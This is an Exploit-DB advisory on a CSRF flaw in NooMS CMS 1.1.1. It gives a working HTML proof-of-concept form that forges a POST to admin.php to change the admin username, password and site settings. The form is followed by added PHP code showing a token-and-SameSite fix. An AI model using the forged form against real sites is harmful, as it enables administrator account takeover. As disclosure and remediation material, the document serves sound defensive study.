Nooms CMS 1.1.1 - Cross-Site Request Forgery

EDB-ID: 17137
CVE: N/A
Platform: PHP
Date: 2011-04-09


# NooMS CMS version 1.1.1 CSRF
# Bug Found: April 9th 2011
# Found by: loneferret (as far as I know anyway)
# Software Download Link:
http://phpkode.com/download/p/2381_nooms_1.1.1.tar.bz2
# Nods to exploit-db Team


# Well, I didn't have much to do this morning so figured I'd try to see how
# fast it would take me to find one of these. It's nothing to write home about.
# I mean...come on! Who would use a CMS named NooMS? This thing uses a MySQL
# database as well, wouldn't be surprised if there are other things to be found.
# But I need to get some chores done before the wife starts.

#
# Enjoy,
# loneferret
#
# p.s:
# I wanted to contact the creator, but his page (using NooMS) is
# blank... nothing there so.. sorry.

---HTML STARTS HERE---

<form action='http://[host]/admin.php' method='post'>
  <input type='hidden' name='op' value='pref'>
  <input type='hidden' name='action' value='edit'>

  Admin Username: <input type='text' size='20' name='admin_user' value=''><br>
  Admin Password: <input type='text' size='20' name='admin_pwd' value=''><br>
  Site Name: <input type='text' size='40' name='site_name' value=''><br>
  Site URL: <input type='text' size='40' name='site_url' value=''><br>
  Number of results per page: <input type='text' size='10' name='search_numr' value=''><br>
  Lang: <input type='text' size='10' name='lang' value='en'><br>
  Theme: <input type='text' name='template' value='default'>
  <input type='submit' value='change'>
</form>
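The form above works because admin.php accepts the op=pref / action=edit POST from any origin as long as the victim's admin session cookie rides along. The example below, added here and not part of the original advisory or of the NooMS project, shows the server-side check that closes this class of bug in a PHP handler: a per-session random token embedded in the legitimate form and verified with a constant-time comparison before any preference is changed, plus a SameSite attribute on the session cookie as a second layer. Only the field names (op, action, admin_user, admin_pwd, site_name, site_url, search_numr, lang, template) come from the proof-of-concept; the function names and the handler structure are hypothetical.

```php
<?php
// Added example (not NooMS code): CSRF protection for a preferences handler.
// Field names come from the PoC form above; everything else is hypothetical.

// Layer 1: SameSite on the session cookie so a cross-site POST does not carry
// the admin session. Requires PHP 7.3+ for the array form of this call.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// Layer 2: one unpredictable token per session. A page on another origin
// cannot read it, so a forged form cannot include the right value.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time check; false on a missing, non-string or wrong token.
function csrf_check($submitted): bool
{
    if (empty($_SESSION['csrf_token']) || !is_string($submitted)) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Hidden field the legitimate preferences form must render.
function csrf_field(): string
{
    return "<input type='hidden' name='csrf_token' value='"
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . "'>";
}

// Hypothetical handler for the same request the PoC forges.
if (($_POST['op'] ?? '') === 'pref' && ($_POST['action'] ?? '') === 'edit') {
    // Refuse anything that is not a POST carrying a valid token. A forged
    // request from another site stops here with no state change.
    if ($_SERVER['REQUEST_METHOD'] !== 'POST'
        || !csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }

    // Token is valid: it is now safe to read admin_user, admin_pwd, site_name,
    // site_url, search_numr, lang and template and persist them.
    // (Validation of those values is out of scope for this example.)
}
```

Embedding `csrf_field()` in the real admin form and rejecting any op=pref/action=edit request that fails `csrf_check()` is the fix; the SameSite cookie attribute is defence in depth rather than a replacement for the token, since older browsers ignore it and Lax still allows some top-level navigations.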